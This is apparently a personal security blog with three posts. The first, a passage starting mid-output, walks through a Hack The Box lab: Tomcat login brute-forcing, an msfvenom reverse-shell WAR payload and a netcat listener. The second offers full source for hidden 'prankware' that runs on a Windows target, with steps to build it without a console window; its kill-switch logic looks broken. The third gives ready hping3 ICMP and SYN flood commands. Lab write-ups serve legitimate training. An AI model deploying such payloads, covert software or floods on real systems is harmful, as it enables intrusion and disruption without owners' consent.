   5   exploit/windows/http/tomcat_cgi_cmdlineargs                     2019-04-10       excellent  Yes    Apache Tomcat CGIServlet enableCmdLineArguments Vulnerability
   6   exploit/multi/http/tomcat_mgr_deploy                            2009-11-09       excellent  Yes    Apache Tomcat Manager Application Deployer Authenticated Code Execution
   7   exploit/multi/http/tomcat_mgr_upload                            2009-11-09       excellent  Yes    Apache Tomcat Manager Authenticated Upload Code Execution
   8   auxiliary/dos/http/apache_tomcat_transfer_encoding              2010-07-09       normal     No     Apache Tomcat Transfer-Encoding Information Disclosure and DoS
   9   auxiliary/scanner/http/tomcat_enum                                               normal     No     Apache Tomcat User Enumeration
   10  exploit/linux/local/tomcat_rhel_based_temp_priv_esc             2016-10-10       manual     Yes    Apache Tomcat on RedHat Based Systems Insecure Temp Config Privilege Escalation
   11  exploit/linux/local/tomcat_ubuntu_log_init_priv_esc             2016-09-30       manual     Yes    Apache Tomcat on Ubuntu Log Init Privilege Escalation
   12  exploit/multi/http/atlassian_confluence_webwork_ognl_injection  2021-08-25       excellent  Yes    Atlassian Confluence WebWork OGNL Injection
   13  exploit/windows/http/cayin_xpost_sql_rce                        2020-06-04       excellent  Yes    Cayin xPost wayfinder_seqid SQLi to RCE
   14  exploit/multi/http/cisco_dcnm_upload_2019                       2019-06-26       excellent  Yes    Cisco Data Center Network Manager Unauthenticated Remote Code Execution
   15  exploit/linux/http/cisco_hyperflex_hx_data_platform_cmd_exec    2021-05-05       excellent  Yes    Cisco HyperFlex HX Data Platform Command Execution
   16  exploit/linux/http/cisco_hyperflex_file_upload_rce              2021-05-05       excellent  Yes    Cisco HyperFlex HX Data Platform unauthenticated file upload to RCE (CVE-2021-1499)
   17  exploit/linux/http/cpi_tararchive_upload                        2019-05-15       excellent  Yes    Cisco Prime Infrastructure Health Monitor TarArchive Directory Traversal Vulnerability
   18  exploit/linux/http/cisco_prime_inf_rce                          2018-10-04       excellent  Yes    Cisco Prime Infrastructure Unauthenticated Remote Code Execution
   19  post/multi/gather/tomcat_gather                                                  normal     No     Gather Tomcat Credentials
   20  auxiliary/dos/http/hashcollision_dos                            2011-12-28       normal     No     Hashtable Collisions
   21  auxiliary/admin/http/ibm_drm_download                           2020-04-21       normal     Yes    IBM Data Risk Manager Arbitrary File Download
   22  exploit/linux/http/lucee_admin_imgprocess_file_write            2021-01-15       excellent  Yes    Lucee Administrator imgProcess.cfm Arbitrary File Write
   23  exploit/linux/http/mobileiron_core_log4shell                    2021-12-12       excellent  Yes    MobileIron Core Unauthenticated JNDI Injection RCE (via Log4Shell)
   24  exploit/multi/http/zenworks_configuration_management_upload     2015-04-07       excellent  Yes    Novell ZENworks Configuration Management Arbitrary File Upload
   25  exploit/multi/http/spring_framework_rce_spring4shell            2022-03-31       manual     Yes    Spring Framework Class property RCE (Spring4Shell)
   26  auxiliary/admin/http/tomcat_administration                                       normal     No     Tomcat Administration Tool Default Access
   27  auxiliary/scanner/http/tomcat_mgr_login                                          normal     No     Tomcat Application Manager Login Utility
   28  exploit/multi/http/tomcat_jsp_upload_bypass                     2017-10-03       excellent  Yes    Tomcat RCE via JSP Upload Bypass
   29  auxiliary/admin/http/tomcat_utf8_traversal                      2009-01-09       normal     No     Tomcat UTF-8 Directory Traversal Vulnerability
   30  auxiliary/admin/http/trendmicro_dlp_traversal                   2009-01-09       normal     No     TrendMicro Data Loss Prevention 5.5 Directory Traversal
   31  post/windows/gather/enum_tomcat                                                  normal     No     Windows Gather Apache Tomcat Enumeration


Interact with a module by name or index. For example info 31, use 31 or use post/windows/gather/enum_tomcat

[msf](Jobs:0 Agents:0) >>

We see an auxiliary/scanner/http/tomcat_mgr_login exploit. To use an exploit we can type "use" and then the exploits assigned index # value from the search results.

Once the exploit has loaded, type "options" and hit Enter. This will bring up the options which we will need to configure.

use 27
[msf](Jobs:0 Agents:0) auxiliary(scanner/http/tomcat_mgr_login) >> options

Module options (auxiliary/scanner/http/tomcat_mgr_login):

   Name              Current Setting                            Required  Description
   ----              ---------------                            --------  -----------
   ANONYMOUS_LOGIN   false                                      yes       Attempt to login with a blank username and password
   BLANK_PASSWORDS   false                                      no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                          yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false                                      no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                                      no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                                      no        Add all users in the current database to the list
   DB_SKIP_EXISTING  none                                       no        Skip existing credentials stored in the current database (Accepted: none, u
                                                                          ser, user&realm)
   PASSWORD                                                     no        The HTTP password to specify for authentication
   PASS_FILE         /usr/share/metasploit-framework/data/word  no        File containing passwords, one per line
                     lists/tomcat_mgr_default_pass.txt
   Proxies                                                      no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                                       yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/b
                                                                          asics/using-metasploit.html
   RPORT             8080                                       yes       The target port (TCP)
   SSL               false                                      no        Negotiate SSL/TLS for outgoing connections
   STOP_ON_SUCCESS   false                                      yes       Stop guessing when a credential works for a host
   TARGETURI         /manager/html                              yes       URI for Manager login. Default is /manager/html
   THREADS           1                                          yes       The number of concurrent threads (max one per host)
   USERNAME                                                     no        The HTTP username to specify for authentication
   USERPASS_FILE     /usr/share/metasploit-framework/data/word  no        File containing users and passwords separated by space, one pair per line
                     lists/tomcat_mgr_default_userpass.txt
   USER_AS_PASS      false                                      no        Try the username as the password for all users
   USER_FILE         /usr/share/metasploit-framework/data/word  no        File containing users, one per line
                     lists/tomcat_mgr_default_users.txt
   VERBOSE           true                                       yes       Whether to print output for all attempts
   VHOST                                                        no        HTTP server virtual host


View the full module info with the info, or info -d command.

[msf](Jobs:0 Agents:0) auxiliary(scanner/http/tomcat_mgr_login) >>

Our RPORT is preconfigured to the correct port but our RHOSTS option is blank and is required to run the exploit. To set this we will need to type "set RHOSTS" then the IP of our target machine and hit Enter. We will see a confirmation line with the set RHOSTS IP.

set RHOSTS 10.10.10.95
RHOSTS => 10.10.10.95
[msf](Jobs:0 Agents:0) auxiliary(scanner/http/tomcat_mgr_login) >>

With everything all set, it's time to run the exploit! Type "run" then hit Enter. Once the exploit is finished running, we can see a successful login using the credentials "tomcat:s3cret"! We can now navigate back to the web server in our browser and access the manager dashboard.

On the dashboard we see an option to upload a WAR file. A WAR file is a file used to distribute JAR-files, Java classes, XML files, tag libraries, static web pages and other resources that together creates a web application. We can instead use this to upload a malicious payload!

Let's generate a reverse tcp payload using MSFvenom:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.13 LPORT=4444 -f war > jerry_warcia.war
Payload size: 1102 bytes
Final size of war file: 1102 bytes

We can now upload this .war file using the Tomcat dashboard and deploy the file to our server. Once it has been uploaded, open a Netcat listening session in your terminal. You will then need to click the name of the uploaded payload back on the Tomcat dashboard to establish the connection. Netcat should now have a shell:

nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.95] 49192
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\apache-tomcat-7.0.88>

You can now navigate through the target system to obtain the root and user .txt flags.

9/09/2024

Y2KERSED: Nostalgic Malware

 __  __  _____   ___   ___  ______  ______   ______  ______  ______      
/_/\/_/\/_____/\/___/\/__/\/_____/\/_____/\ /_____/\/_____/\/_____/\     
\ \ \ \ \:::_:\ \::.\ \\ \ \::::_\/\:::_ \ \\::::_\/\::::_\/\:::_ \ \    
 \:\_\ \ \  _\:\|\:: \/_) \ \:\/___/\:(_) ) )\:\/___/\:\/___/\:\ \ \ \   
  \::::_\/ /::_/__\:. __  ( (\::___\/\: __ `\ \_::._\:\::___\/\:\ \ \ \  
    \::\ \ \:\____/\: \ )  \ \\:\____/\ \ `\ \ \/____\:\:\____/\:\/.:| | 
     \__\/  \_____\/\__\/\__\/ \_____\/\_\/ \_\/\_____\/\_____\/\____/_/

Y2KERSED is some Python code I wrote a while back that is supposed to be utilized as some not-so-malicious malware that I simply label as prankware. The script creates a hidden folder on a Windows target computer and downloads AOL Instant Messenger sounds sourced from the internet and plays them in the background at random intervals. This is obviously meant to get on the targets nerves à la nostalgia. Who doesn't miss those AIM audio alerts?

I added a kill switch to the script that can be enabled by setting the computers clock between 2000-01-01 00:00:00 and 2000-01-02 00:00:00. Happy New Year!

In order to create an executable file that runs without the console on the targets machine you will need to run the Python file through pyinstaller.exe using the command below:

pyinstaller.exe Y2KAudioPlugin.py --onefile --noconsole

I have included the script below as well as a link to the GitHub repository here. Remember, turn your computer off before midnight on 12/31/99.

#!/usr/bin/python3
# __  __  _____   ___   ___  ______  ______   ______  ______  ______
#/_/\/_/\/_____/\/___/\/__/\/_____/\/_____/\ /_____/\/_____/\/_____/\
#\ \ \ \ \:::_:\ \::.\ \\ \ \::::_\/\:::_ \ \\::::_\/\::::_\/\:::_ \ \
# \:\_\ \ \  _\:\|\:: \/_) \ \:\/___/\:(_) ) )\:\/___/\:\/___/\:\ \ \ \
#  \::::_\/ /::_/__\:. __  ( (\::___\/\: __ `\ \_::._\:\::___\/\:\ \ \ \
#    \::\ \ \:\____/\: \ )  \ \\:\____/\ \ `\ \ \/____\:\:\____/\:\/.:| |
#     \__\/  \_____\/\__\/\__\/ \_____\/\_\/ \_\/\_____\/\_____\/\____/_/ V1.0
#
# Y2KERSED is prankware developed by Kersed. This malware makes the
# target Windows system randomly play AIM audio files from the 90s and early 00s.
# Kill switch can be enabled by setting system clock between
# 2000-01-01 00:00:00 and 2000-01-02 00:00:00.
#

import os
import string
import time
import datetime
import requests
import random
from random import randint
from playsound import playsound

#Audio file source URLs
audio_url_list = ["https://archive.org/download/im_20191103/BuddyIn.wav",
                  "https://archive.org/download/im_20191103/BuddyOut.wav",
                  "https://archive.org/download/im_20191103/You%27ve%20Got%20Mail.wav",
                  "https://archive.org/download/im_20191103/IM.wav"]

#Kill check
kill_check = datetime.datetime.now()
start = datetime.datetime.strptime("01-01-2000", "%d-%m-%Y")
end = datetime.datetime.strptime("02-01-2000", "%d-%m-%Y")

#Run Y2KAudioPlugin
while start <= kill_check >= end:

    #Download sound folder
    if not os.path.exists(r"C:\\Y2KAudioPlugin"):

        #Create hidden folder
        os.chdir("C:\\")
        os.mkdir("Y2KAudioPlugin")
        os.system("attrib +h Y2KAudioPlugin")
        os.chdir("C:\\Y2KAudioPlugin")
        directory = os.getcwd()

        #Download WAVs to hidden folder
        for url in audio_url_list:
            filename = directory + "\\" + random.choice(string.ascii_letters) + ".wav"
            r = requests.get(url)
            with open(filename, 'wb') as f:
                f.write(r.content)

    #Play sound files
    if start <= kill_check >= end:
        sound_path = r"C:\\Y2KAudioPlugin"
        sound_files = os.listdir(sound_path)
        sound_file = random.choice(sound_files)
        full_sound_path = str(sound_path + "\\" + sound_file)
        playsound(full_sound_path)
        time.sleep(randint(0, 5))  #Delay between sounds
        kill_check = datetime.datetime.now()

    #Kill check terminate
    else:
        quit()

#Kill check terminate
if start >= kill_check >= end:
    quit()

9/04/2024

Understanding DoS Attacks

  **       **       **
  **       **       **
|\**/|   |\**/|   |\**/| 
\ == /   \ == /   \ == /
 |  |     |  |     |  |
 |__|     |__|     |__|
 \  /     \  /     \  /
  \/       \/       \/

A DoS (Denial-of-Service) attack targets a network/server and floods it with network traffic, ultimately causing service disruption by overloading the target network and causing it to crash. To have a better understanding of DoS attacks on the network level, we need to understand how network traffic is transported. Network traffic is broken up and sent via data packets to the destination.

An ICMP flood attack is a type of DoS attack performed by an attacker repeatedly sending Internet Control Message Protocol (ICMP) packets to a network server. This forces the targeted server to send an ICMP packet back. This eventually uses up all the bandwidth for incoming and outgoing traffic and causes the server to crash. We can replicate this attack using a packet generator program called hping, which can be downloaded from most Linux repositories. See the command below where "*target_ip*" is the ip of the targeted network and "-1" utilizes the ICMP protocol:

sudo hping3 -1 --flood *target_ip*

Another common DoS attack is the SYN flood attack. This attack uses the Transmission Control Protocol (TCP) and floods the server with synchronize (SYN) packets. To establish a TCP connection, a device sends a SYN packet request to a server. The server then responds with a SYN/ACK packet to acknowledge the receipt of the device's request and leaves a port open for the final step of the handshake. Once the server receives the final acknowledgement (ACK) packet from the device, the 3-way handshake is complete and a TCP connection is established. Attackers can take advantage of the protocol by flooding a server with SYN packet requests and never fully completing the 3-way handshake. This attack can be replicated using hping with the following command, where "-d 300" is the amount of data in bytes you wish to send in the packet, "-p 80" is the desired port you wish to attack, the "-S" switch places hping in SYN mode, and "*target_ip*" is the ip of the targeted network:

sudo hping3 -d 300 -p 80 -S --flood *target_ip*

A standard DoS attack utilizing a single source of network traffic is usually not enough to cause any major disruptions, let alone crash a network. A DDoS attack is a Distributed Denial-of-Service attack. DDoS attacks are usually performed using botnets, a large collection of compromised private internet-connected devices infected with malware and controlled as a group. These compromised devices are sometimes refereed to as "zombies". Using a botnet, an attacker can send requests from these computers to have a larger impact on the networks bandwidth, making it easier to crash the target network.